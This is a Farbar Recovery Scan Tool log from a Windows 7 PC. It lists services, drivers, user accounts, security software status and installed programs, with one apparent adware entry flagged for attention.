S3 VSStandardCollectorService140; C:\Program Files\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [48872 2016-03-22] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Corporation)
S2 Amsp; "C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe" coreFrameworkHost.exe -m=rb -dt=60000 [X]
S2 HWDeviceService.exe; "C:\ProgramData\DatacardService\HWDeviceService.exe" -/service [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BroadcomWModem; C:\Windows\System32\DRIVERS\bcmww.sys [118400 2005-06-02] (Broadcom Corporation)
R3 EvolveVirtualAdapter; C:\Windows\System32\DRIVERS\evolve.sys [18584 2013-06-12] (Echobit, LLC)
R3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [27040 2015-11-12] (LogMeIn, Inc.)
R2 IntelHaxm; C:\Windows\System32\DRIVERS\IntelHaxm.sys [78848 2015-01-30] (Intel Corporation)
R1 ISODrive; C:\Program Files\UltraISO\drivers\ISODrive.sys [82320 2010-01-29] (EZB Systems, Inc.)
S3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [22856 2013-04-04] (Malwarebytes Corporation)
U0 Partizan; C:\Windows\System32\drivers\Partizan.sys [40304 2016-03-12] (Greatis Software)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [20288 2015-06-12] (Razer, Inc.)
S4 secdrv; C:\Windows\system32\Drivers\secdrv.sys [12528 2015-11-07] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) [File not signed]
S0 sfdrv01; C:\Windows\System32\drivers\sfdrv01.sys [50176 2005-05-17] (Protection Technology) [File not signed]
R0 sfhlp02; C:\Windows\System32\drivers\sfhlp02.sys [6656 2005-05-16] (Protection Technology) [File not signed]
S0 sfsync02; C:\Windows\System32\drivers\sfsync02.sys [19968 2005-05-16] (Protection Technology) [File not signed]
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [721904 2013-07-31] () [File not signed]
R3 tap-tb-0901; C:\Windows\System32\DRIVERS\tap-tb-0901.sys [33280 2015-08-10] (The OpenVPN Project)
R3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [26624 2011-12-15] (The OpenVPN Project)
R2 tmactmon; C:\Windows\System32\DRIVERS\tmactmon.sys [80464 2012-01-06] (Trend Micro Inc.)
R2 tmcomm; C:\Windows\System32\DRIVERS\tmcomm.sys [189520 2012-01-06] (Trend Micro Inc.)
R2 tmevtmgr; C:\Windows\System32\DRIVERS\tmevtmgr.sys [64080 2012-01-06] (Trend Micro Inc.)
R1 tmtdi; C:\Windows\System32\DRIVERS\tmtdi.sys [92112 2012-01-06] (Trend Micro Inc.)
R3 XSplit_Dummy; C:\Windows\System32\drivers\xspltspk.sys [22104 2014-07-02] (SplitmediaLabs Limited)
R3 zttap200; C:\Windows\System32\DRIVERS\zttap200.sys [28824 2014-03-05] ()
U3 am2liese; C:\Windows\system32\Drivers\am2liese.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
S3 EagleXNt; \??\C:\Windows\system32\drivers\EagleXNt.sys [X]
S3 ewusbnet; system32\DRIVERS\ewusbnet.sys [X]
S3 hwusbdev; system32\DRIVERS\ewusbdev.sys [X]
S3 TuneUpUtilitiesDrv; \??\C:\Program Files\TuneUp Utilities 2013\TuneUpUtilitiesDriver32.sys [X]
S3 vtany; \??\C:\Windows\vtany.sys [X]
S3 XDva397; \??\C:\Windows\system32\XDva397.sys [X]
S3 XDva410; \??\C:\Windows\system32\XDva410.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

The Addition.txt file:
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 13-10-2016
Ran by violeta (14-10-2016 22:20:43)
Running from C:\Users\violeta\Desktop
Microsoft Windows 7 Professional Service Pack 1 (X86) (2011-12-18 15:08:34)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3268508096-794200350-1188608446-500 - Administrator - Disabled)
ASPNET (S-1-5-21-3268508096-794200350-1188608446-1004 - Limited - Enabled)
Guest (S-1-5-21-3268508096-794200350-1188608446-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3268508096-794200350-1188608446-1002 - Limited - Enabled)
violeta (S-1-5-21-3268508096-794200350-1188608446-1000 - Administrator - Enabled) => C:\Users\violeta

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Trend Micro Titanium Internet Security (Disabled - Out of date) {68F968AC-2AA0-091D-848C-803E83E35902}
AS: Trend Micro Titanium Internet Security (Disabled - Out of date) {D3988948-0C9A-0693-BE3C-BB4CF86413BF}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM\...\Adobe AIR) (Version: 18.0.0.180 - Adobe Systems Incorporated)
Adobe Flash CS4 Professional (HKLM\...\Adobe_a68eec966ce913ddaa63251dc82ed31) (Version: 10.0 - Adobe Systems Incorporated)
Adobe Flash Player 23 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 23.0.0.162 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 23.0.0.162 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Media Player (HKLM\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1 - Adobe Systems Incorporated)
Adobe Photoshop CS4 (HKLM\...\Adobe_faf656ef605427ee2f42989c3ad31b8) (Version: 11.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM\...\Adobe Shockwave Player) (Version: 12.1.3.153 - Adobe Systems, Inc.)
AirDroid 3.1.3.0 (HKLM\...\AirDroid) (Version: 3.1.3.0 - Sand Studio)
Android Studio (HKLM\...\Android Studio) (Version: 1.0 - Google Inc.)
Application Insights Tools for Visual Studio 2013 (Version: 2.1 - Microsoft Corporation) Hidden
Application Insights Tools for Visual Studio 2015 (HKLM\...\{981F324E-98F4-4784-B76F-04E92039F3F6}) (Version: 5.2.60328.3 - Microsoft Corporation)
Archeblade (HKLM\...\Steam App 207230) (Version: - )
Assassin's Creed II (HKLM\...\{8570BEE8-0CA3-4977-9AB1-80ED93F0513C}) (Version: 1.01 - Ubisoft)
Autodesk SketchBook (HKLM\...\{C0D41025-EDBF-4354-A5BA-86B27A78BC25}) (Version: 8.00.0001 - Autodesk)
Awesomenauts (HKLM\...\Steam App 204300) (Version: - Ronimo Games)
Azure AD Authentication Connected Service (Version: 14.0.23107 - Microsoft Corporation) Hidden
AzureTools.Notifications (Version: 2.1.10731.1602 - Microsoft Corporation) Hidden
AzureTools.Notifications (Version: 2.7.30611.1601 - Microsoft Corporation) Hidden
Bandisoft MPEG-1 Decoder (HKLM\...\BandiMPEG1) (Version: - Bandisoft.com)
Battle.net (HKLM\...\Battle.net) (Version: - Blizzard Entertainment)
Behaviors SDK (Windows Phone) for Visual Studio 2013 (Version: 12.0.50716.0 - Microsoft Corporation) Hidden
Behaviors SDK (Windows) for Visual Studio 2013 (Version: 12.0.50429.0 - Microsoft Corporation) Hidden
Bejeweled® 3 (HKLM\...\{E99C27B2-EB2E-4244-9F5C-A96F55100F0C}) (Version: 1.1.13.4753 - Electronic Arts, Inc.)
Bing Bar (HKLM\...\{16793295-2366-40F7-A045-A3E42A81365E}) (Version: 7.1.362.0 - Microsoft Corporation)
Blend for Visual Studio 2013 (Version: 12.0.41002.1 - Microsoft Corporation) Hidden
Blend for Visual Studio 2013 ENU resources (Version: 12.0.41002.1 - Microsoft Corporation) Hidden
Blend for Visual Studio SDK for .NET 4.5 (Version: 3.0.40218.0 - Microsoft Corporation) Hidden
Blend for Visual Studio SDK for Silverlight 5 (Version: 3.0.40218.0 - Microsoft Corporation) Hidden
Blocks That Matter Demo (HKLM\...\Steam App 200570) (Version: - Swing Swing Submarine)
Bonjour (HKLM\...\{07287123-B8AC-41CE-8346-3D777245C35B}) (Version: 1.0.106 - Apple Inc.)
Brawlhalla (HKLM\...\Steam App 291550) (Version: - Blue Mammoth Games)
Brick-Force (EU) (HKLM\...\Steam App 335330) (Version: - Exe Games Inc.)
BS.Player FREE (HKLM\...\BSPlayerf) (Version: 2.57.1051 - Webteh, d.o.o.)
Build Tools - x86 (Version: 12.0.30723 - Microsoft Corporation) Hidden
Build Tools Language Resources - x86 (Version: 12.0.30723 - Microsoft Corporation) Hidden
Buzz Lightyear of Star Command (HKLM\...\Buzz Lightyear of Star Command) (Version: - )
CamStudio 2.7.4 (HKLM\...\{04B83666-3A62-452B-85D3-70F8117F2329}_is1) (Version: 2.7.4 - CamStudio Open Source)
Camtasia Studio 7 (HKLM\...\{53FA9A9F-3C19-4D43-AD6B-DEF365D469BA}) (Version: 7.0.0 - TechSmith Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 5.17 - Piriform)
City of Heroes (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\NCsoft-CityOfHeroes) (Version: - NCsoft)
Clicker Heroes (HKLM\...\Steam App 363970) (Version: - Playsaurus)
CodeBlocks (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\CodeBlocks) (Version: 13.12 - The Code::Blocks Team)
Command & Conquer Generals (HKLM\...\InstallShield_{06F80017-8F98-4C94-B868-52358569FC32}) (Version: 0.50.0000 - Electronic Arts)
Command & Conquer Generals (Version: 0.50.0000 - Electronic Arts) Hidden
Command and ConquerTM Generals Zero Hour (HKLM\...\InstallShield_{F3E9C243-122E-4D6B-ACC1-E1FEC02F6CA1}) (Version: 1.00.0000 - Electronic Arts)
Command and ConquerTM Generals Zero Hour (Version: 1.00.0000 - Electronic Arts) Hidden
Connect (Version: 1.0.0.1 - Adobe Systems Incorporated) Hidden
Contextual Tool Yourprofitclub (HKLM\...\6bc9c203) (Version: - ) <==== ATTENTION
Counter-Strike 1.6 (HKLM\...\Counter-Strike 1.6) (Version: 1.6 - Valve)
CuteFTP 9 (HKLM\...\{89B9E358-75C6-4C6B-BD38-803FF156CC4B}) (Version: 9.0.0 - Globalscape)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Day of Defeat Source version 3398447 (HKLM\...\{A3CC13B7-6A0B-457C-B9C9-F1F2D20F5429}_is1) (Version: 3398447 - Strogino CS Portal)
Democracy 3 - Africa (HKLM\...\1459868439_is1) (Version: 2.2.0.3 - GOG.com)
Democracy 3 (HKLM\...\1207659953_is1) (Version: 2.10.0.16 - GOG.com)
Dotfuscator and Analytics Community Edition (Version: 5.5.4954.46574 - PreEmptive Solutions) Hidden
Dotfuscator and Analytics Community Edition 5.19.1 (Version: 5.19.1.3091 - PreEmptive Solutions) Hidden
Duelyst (HKLM\...\Steam App 291410) (Version: - Counterplay Games Inc.)
Dungeon Crawl Stone Soup (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\Crawl) (Version: 0.14.1 - )
Dungeon Keeper 2 (HKLM\...\GOGPACKDUNGEONKEEPER2_is1) (Version: 2.0.0.32 - GOG.com)
Dungeon Party (HKLM\...\Steam App 215870) (Version: - )
Dungeonland (HKLM\...\Steam App 218130) (Version: - Critical Studio)
Elsword version v6.0824.5.2 (HKLM\...\{E655DDFC-24DB-4FC3-8474-271E911309B4}_is1) (Version: v6.0824.5.2 - KOGGAMES)
Entity Framework 6.1.1 Tools for Visual Studio 2013 (HKLM\...\{85253F13-EE42-4850-A3A5-79B90E92D7AC}) (Version: 12.0.30610.0 - Microsoft Corporation)
Europa Universalis III (HKLM\...\{59C80C5E-8C92-40FF-B910-2BB5C7281F61}) (Version: - )
Evolve (HKLM\...\{670B1B49-9FD3-4827-9B41-471EFF580AA8}) (Version: 1.8.18 - Echobit, LLC)
Far Cry (HKLM\...\InstallShield_{D6DBDC2A-E72C-4284-B6AD-6B3B61B4DABC}) (Version: 1.00.0000 - Ubisoft)
Far Cry (Patch 1.4) (Version: 1.00.0000 - Ubisoft) Hidden
Far Cry (Version: 1.00.0000 - Ubisoft) Hidden
FeralHeart version 1.13 (HKLM\...\{EAD29228-1A50-4178-B1EA-E1D83FC691F0}_is1) (Version: 1.13 - Kovuworks)
FireArc Arcade (HKLM\...\{3D25A35C-55FC-4A4C-8C94-A08DFB0C565F}) (Version: 0.5.17 - FireArc.com)
Foxit Reader (HKLM\...\Foxit Reader_is1) (Version: 5.4.2.901 - Foxit Corporation)
Fraps (remove only) (HKLM\...\Fraps) (Version: - )
Freemake Video Converter version 4.1.7 (HKLM\...\Freemake Video Converter_is1) (Version: 4.1.7 - Ellora Assets Corporation)
Game Maker 8.0 (HKLM\...\Game Maker 8.0) (Version: - )
GarrysMod - FuzeRip (HKLM\...\GmodFuzeRipNoSteam) (Version: - Fuze_man)
GOG.com Dungeon Keeper 2 (HKLM\...\{b6462b67-caf5-4a74-99df-cc2811bd1957}.sdb) (Version: - )
Google Earth Plug-in (HKLM\...\{57BB4801-61C8-4E74-9672-2160728A461E}) (Version: 7.1.5.1557 - Google)
Google Update Helper (Version: 1.3.31.5 - Google Inc.) Hidden
Gotham City Impostors: Free To Play (HKLM\...\Steam App 206210) (Version: - )
Gtk# for .Net 2.12.26 (HKLM\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.)
Guitar Hero III (HKLM\...\{0CE1A6C0-F3F7-49E6-8F9D-2431F9827441}) (Version: 1.3 - Aspyr)
Guitar Hero Three Control Panel (HKLM\...\{FC7CCCFB-2081-4E9D-8F6D-CAAE87267E6C}) (Version: 2.0.4 - Sigma Production Inc.)
Half-Life Dedicated Server (HKLM\...\Steam App 90) (Version: - )
Happy Cloud Client (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\HappyCloud) (Version: 4.54 - Happy Cloud, Inc.)
Hearthstone (HKLM\...\Hearthstone) (Version: - Blizzard Entertainment)
Heroes & Generals (HKLM\...\Heroes & Generals) (Version: 1.0.6.1 - Reto-Moto)
Heroes of Might and Magic 3 Complete (HKLM\...\Heroes of Might and Magic 3 Complete_is1) (Version: - GOG.com)
Heroes of Might and Magic V Bundle (HKLM\...\Heroes of Might and Magic V Bundle_is1) (Version: - GOG.com)
HiPatch (HKLM\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.0.6.4 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Hitman Blood Money version 1.2.0.0 (HKLM\...\Hitman Blood Money_is1) (Version: 1.2.0.0 - Mr DJ)
Hunger Dungeon (HKLM\...\Steam App 513560) (Version: - Buka Game Studio)
IIS 8.0 Express (HKLM\...\{B8FFB7D6-6ABD-47C3-8BAD-86FF5D8F3EDC}) (Version: 8.0.1557 - Microsoft Corporation)
IIS Express Application Compatibility Database for x86 (HKLM\...\{fdfba1f3-74ae-4255-9c10-a0f552b4610f}.sdb) (Version: - )
ImgBurn (HKLM\...\ImgBurn) (Version: 2.5.8.0 - LIGHTNING UK!)
Intel Driver Update Utility (HKLM\...\{45076b94-d6e6-41ae-abd0-609e78177aee}) (Version: 2.1.0.17 - Intel)
Intel XDK (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\ARP_for_prd_xdk_0.0.3357) (Version: 0.0.3357 - Intel Corporation)
Intel(R) Control Center (HKLM\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel(R) Graphics Media Accelerator Driver (HKLM\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2869 - Intel Corporation)
Intel® Hardware Accelerated Execution Manager (HKLM\...\{ECCB31F5-435D-4F37-A98D-5854D3C62718}) (Version: 1.1.1 - Intel Corporation)
ioquake3 (HKLM\...\ioquake3) (Version: - )
Java 8 Update 45 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
Java 8 Update 91 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83218091F0}) (Version: 8.0.910.15 - Oracle Corporation)
Java SE Development Kit 8 Update 40 (HKLM\...\{32A3A4F4-B792-11D6-A78A-00B0D0180400}) (Version: 8.0.400.26 - Oracle Corporation)
Junk Mail filter update (Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Kit SDK de vérification de Visual Studio 2012 - fra (Version: 12.0.30501 - Microsoft Corporation) Hidden
K-Lite Codec Pack 8.7.0 (Basic) (HKLM\...\KLiteCodecPack_is1) (Version: 8.7.0 - )
kuler (Version: 2.0 - Adobe Systems Incorporated) Hidden
Lightshot-5.4.0.1 (HKLM\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.4.0.1 - Skillbrains)
Loadout (HKLM\...\Steam App 208090) (Version: - Edge of Reality)
LocalESPC (Version: 8.59.29989 - Microsoft Corporation) Hidden
LocalESPC Dev12 (Version: 8.100.25984 - Microsoft Corporation) Hidden
LocalESPCui for en-us Dev12 (Version: 8.100.25984 - Microsoft) Hidden
LogMeIn Hamachi (HKLM\...\LogMeIn Hamachi) (Version: 2.2.0.519 - LogMeIn, Inc.)
LogMeIn Hamachi (Version: 2.2.0.519 - LogMeIn, Inc.) Hidden
Magicite version 1.3 (HKLM\...\Magicite_is1) (Version: 1.3 - GMT-MAX.ORG)
Managed DirectX (0901) (Version: 4.09.00.0901 - Microsoft) Hidden
Marvel Heroes (HKLM\...\Steam App 226320) (Version: - )
Memory Profiler (Version: 12.0.30723 - Microsoft Corporation) Hidden
MFC RunTime files (Version: 1.0.0 - Extensoft) Hidden
Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1 (1033)) (Version: - )
Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM\...\{56E962F0-4FB0-3C67-88DB-9EAA6EEFC493}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5 SDK (HKLM\...\{4AE57014-05C4-4864-A13D-86517A7E1BA4}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (ENU) (HKLM\...\{D3517C62-68A5-37CF-92F7-93C029A89681}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (HKLM\...\{6A0C6700-EA93-372C-8871-DCCF13D160A4}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 SDK (HKLM\...\{19A5926D-66E1-46FC-854D-163AA10A52D3}) (Version: 4.5.51641 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (ENU) (HKLM\...\{290FC320-2F5A-329E-8840-C4193BD7A9EE}) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (HKLM\...\{19E8AE59-4D4A-3534-B567-6CC08FA4102E}) (Version: 4.5.51651 - Microsoft Corporation)
Microsoft .NET Framework 4.6 SDK (HKLM\...\{B5915D37-0637-4A26-A3AA-C5DC9F856370}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (ENU) (HKLM\...\{034547E9-D8FA-49E7-8B9C-4C9861FB9146}) (Version: 4.6.00127 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (HKLM\...\{2CC6A4A7-AAC2-46C9-9DBB-3727B5954F65}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 SDK (HKLM\...\{2F0ECC80-B9E4-4485-8083-CD32F22ABD92}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (ENU) (HKLM\...\{8EEB28EE-5141-411C-9CF0-9952264FE4AF}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (HKLM\...\{8BC3EEC9-090F-4C53-A8DA-1BEC913040F9}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM\...\{832D9DE0-8AFC-4689-9819-4DBBDEBD3E4F}) (Version: 3.5.92.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft Help Viewer 2.1 (HKLM\...\Microsoft Help Viewer 2.1) (Version: 2.1.21005 - Microsoft Corporation)
Microsoft Help Viewer 2.2 (HKLM\...\Microsoft Help Viewer 2.2) (Version: 2.2.25123 - Microsoft Corporation)
Microsoft Office 2003 programski dodatak za preslovljavanje (HKLM\...\{51312349-0B4D-450E-AFAA-03CC28A9531F}) (Version: 1.0.0527.0 - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Outlook Connector (HKLM\...\{95140000-007A-0409-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Silverlight 5 SDK (HKLM\...\{E1FBB3D4-ADB0-4949-B101-855DA061C735}) (Version: 5.0.61118.0 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\SkyDriveSetup.exe) (Version: 16.4.6010.0727 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2012 Command Line Utilities (HKLM\...\{5EF1EBC5-4A40-4D1C-B02E-0C54BC93FD06}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Data-Tier App Framework (HKLM\...\{1B876496-B3A2-4D22-9B12-B608A3FD4B8B}) (Version: 11.1.2902.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Express LocalDB (HKLM\...\{FE939060-416C-4ECD-890E-13776E2707C4}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Management Objects (HKLM\...\{2F7DBBE6-8EBC-495C-9041-46A772F4E311}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client (HKLM\...\{544ACD54-9FAA-4A60-A1E7-B2EC3AA75D24}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL ScriptDom (HKLM\...\{E7654811-38F9-4225-9688-827FDA716582}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 T-SQL Language Service (HKLM\...\{04DD7AF4-A6D3-4E30-9BB9-3B3670719234}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects (HKLM\...\{2774595F-BC2A-4B12-A25B-0C37A37049B0}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Transact-SQL ScriptDom (HKLM\...\{C340BAB2-9A21-41B9-A465-7AC7B1DF773E}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 T-SQL Language Service (HKLM\...\{47D08E7A-92A1-489B-B0BF-415516497BCE}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 Design Tools ENU (HKLM\...\{2E5C075E-11AB-4BDD-918C-7B9A68953FF8}) (Version: 3.5.5386.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 ENU (HKLM\...\{BCC899FE-2DAA-460C-A5FB-60291E73D9C3}) (Version: 3.5.5386.0 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 SP1 ENU (HKLM\...\{773AC1E4-5F27-4DF6-A932-7FDDE35C069D}) (Version: 4.0.8876.1 - Microsoft Corporation)
Microsoft SQL Server Data Tools - enu (12.0.30919.1) (HKLM\...\{0D7FCBFB-F478-4D32-901C-83F0BF5A3501}) (Version: 12.0.30919.1 - Microsoft Corporation)
Microsoft SQL Server Data Tools Build Utilities - enu (12.0.30919.1) (HKLM\...\{6781FF9B-E87D-4A03-9373-A55A288B83FA}) (Version: 12.0.30919.1 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM\...\{A47FD1BF-A815-4A76-BE65-53A15BD5D25D}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2012 (HKLM\...\{070C38AC-05CE-43DF-9A20-141332F6AB2B}) (Version: 11.1.3366.16 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{091CE6AA-2753-4F6E-AD1C-0E875744EB54}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft Visual Basic 2008 Express Edition - ENU (HKLM\...\Microsoft Visual Basic 2008 Express Edition - ENU) (Version: - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x86) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x86)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2015 Tools for Unity (HKLM\...\{D68E6605-F852-4936-AB64-04B80E0C85AD}) (Version: 2.2.0.0 - Microsoft Corporation)
Microsoft Visual Studio Community 2015 with Update 2 (HKLM\...\{04fa3a35-1f49-4510-8051-819cdc1e6e01}) (Version: 14.0.25123.0 - Microsoft Corporation)
Microsoft Visual Studio Ultimate 2013 with Update 3 (HKLM\...\{71688083-99e8-4e10-9522-8e98a130c438}) (Version: 12.0.30723 - Microsoft Corporation)
Microsoft Web Deploy 3.5 (HKLM\...\{D58573E7-F82D-41E4-B10B-3041202A51D2}) (Version: 3.1237.1763 - Microsoft Corporation)
Microsoft Windows SDK for Visual Studio 2008 Express Tools for .NET Framework (HKLM\...\{B4C0A315-07FB-39F9-85CD-8CE20C019350}) (Version: 3.5.21022 - Microsoft)
